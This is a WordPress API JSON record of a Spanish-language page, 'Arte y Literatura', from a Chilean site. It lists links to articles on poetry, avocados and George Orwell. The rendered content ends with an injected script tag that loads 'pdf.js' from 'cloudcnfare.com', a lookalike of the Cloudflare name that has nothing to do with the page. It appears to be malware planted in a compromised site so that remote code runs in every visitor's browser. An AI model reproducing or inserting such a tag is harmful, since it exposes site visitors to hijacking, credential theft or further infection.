{"id":1380,"date":"2018-09-15T15:26:44","date_gmt":"2018-09-15T18:26:44","guid":{"rendered":"http:\/\/www.probidadenchile.cl\/wp\/?page_id=1380"},"modified":"2018-09-15T16:43:26","modified_gmt":"2018-09-15T19:43:26","slug":"arte-y-literatura","status":"publish","type":"page","link":"https:\/\/www.probidadenchile.cl\/wp\/articulos\/arte-y-literatura\/","title":{"rendered":"Arte y Literatura"},"content":{"rendered":"<p>En esta p\u00e1gina se encuentran diversos art\u00edculos sobre arte y literatura.<\/p>\n<ul>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/un-verano-en-mirasol\/\"><br \/>\nUn verano en Mirasol<br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/el-misterio-de-las-paltas\/\"><br \/>\nEl misterio de las paltas.<br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/el-pais-de-la-poesia\/\"><br \/>\nEl pa\u00eds de la poes\u00eda.<br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/no-se-puede-servir-a-dos-senores\/\"><br \/>\nNo se puede servir a dos se\u00f1ores simultaneamente<br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/como-comunicarse-con-los-dioses\/\"><br \/>\nC\u00f3mo comunicarse con los dioses.<br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/homenaje-y-defensa-de-george-orwell\/\"><br \/>\nHomenaje y defensa de George Orwell.<br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/homenaje-a-orwell\/\"><br \/>\nHomenaje a George Orwell.<br \/>\n<\/a><\/li>\n<li><a href=\"http:\/\/www.probidadenchile.cl\/wp\/orwell-y-la-violencia\/\"><br \/>\nOrwell y la violencia.<br \/>\n<\/a><\/li>\n<\/ul>\n<p><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En esta p\u00e1gina se encuentran diversos art\u00edculos sobre arte y literatura. Un verano en Mirasol El misterio de las paltas. El pa\u00eds de la poes\u00eda. No se puede servir a dos se\u00f1ores simultaneamente C\u00f3mo comunicarse con los dioses. Homenaje y defensa de George Orwell. Homenaje a George Orwell. Orwell y la violencia.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1292,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1380","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/pages\/1380","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/comments?post=1380"}],"version-history":[{"count":10,"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/pages\/1380\/revisions"}],"predecessor-version":[{"id":1415,"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/pages\/1380\/revisions\/1415"}],"up":[{"embeddable":true,"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/pages\/1292"}],"wp:attachment":[{"href":"https:\/\/www.probidadenchile.cl\/wp\/wp-json\/wp\/v2\/media?parent=1380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}